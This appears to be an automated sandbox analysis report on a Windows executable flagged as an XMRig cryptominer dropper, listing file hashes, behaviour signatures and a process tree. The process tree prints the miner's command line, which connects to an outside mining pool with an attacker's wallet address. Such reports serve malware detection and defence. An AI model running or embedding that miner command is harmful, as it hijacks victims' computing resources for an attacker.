Analysis

  • max time kernel
    15s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    27/10/2024, 12:30

General

  • Target

    1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe

  • Size

    2.4MB

  • MD5

    f7a709560c8c538bf840d38adad98060

  • SHA1

    4396b0b5699837c1fddedb91c832b09a6a9ca2b9

  • SHA256

    1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97

  • SHA512

    5cec8dc34a2df3d62aa056b1826708d6e1e81d6d87bac2074fdc243e614e191799366e9411f0c7e48e74799131a0eb02916e7b10a5f63a81e0997482c3d1ca99

  • SSDEEP

    49152:nILryvOacuT9fbDxw6++uxp+NqiurJoP6rZ0B1qxtVujoiJ67XoifXUGOOnx:n3zfaJ+uxp+8rZ9t8JQfEQx

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe
    "C:\Users\Admin\AppData\Local\Temp\1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\1.cmd" "
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Users\Admin\AppData\Local\Temp\xmrig.exe
        xmrig --url pool.hashvault.pro:80 --user 44nkuDevyMkUnE7Lc4kJThfZqW3zyQ62nZxB9Ca6ikxTK7SMYdLmb9eSdp3PcYDwziHMN1xyq3Yq7BNcbGXDCBhWMzEVEBX --pass UOO
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1480

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\1.cmd

          Filesize

          182B

          MD5

          5ee6977e66bcd50d25effdec2d2a23d0

          SHA1

          d6817af66d573ee64e29dec0bc7e47e732b0da3c

          SHA256

          a42894d4886ca4eb3fe3ea985ece123987008b7644ca18fa9837d28e8fbb5488

          SHA512

          30a508e5282aa263f3dafc36a0fcc6675b3105da4e70cfa4176416c893e441695336335d128d680bdee4cbf2b2defe9fdc3adba7116ad0a5631e3433390936f3

        • \Users\Admin\AppData\Local\Temp\xmrig.exe

          Filesize

          6.1MB

          MD5

          5fba8ae226b096da3b31de0e17496735

          SHA1

          d532a01254cf9e0229d3c5803b78ff7c9b0cb8d3

          SHA256

          ca28f4aeaa5e16d216cd828b67454a56f3c7feeb242412d26ed914fadff20d40

          SHA512

          951e44fc0864a6741bcbb4227feb5429a032713dabd91102f4f0e27a69181ce7f23562e902cc09896ae26334b6d18caf0f5a13d81370bd703fd7ed6f78b47e72

        • memory/1480-23-0x0000000000310000-0x0000000000330000-memory.dmp

          Filesize

          128KB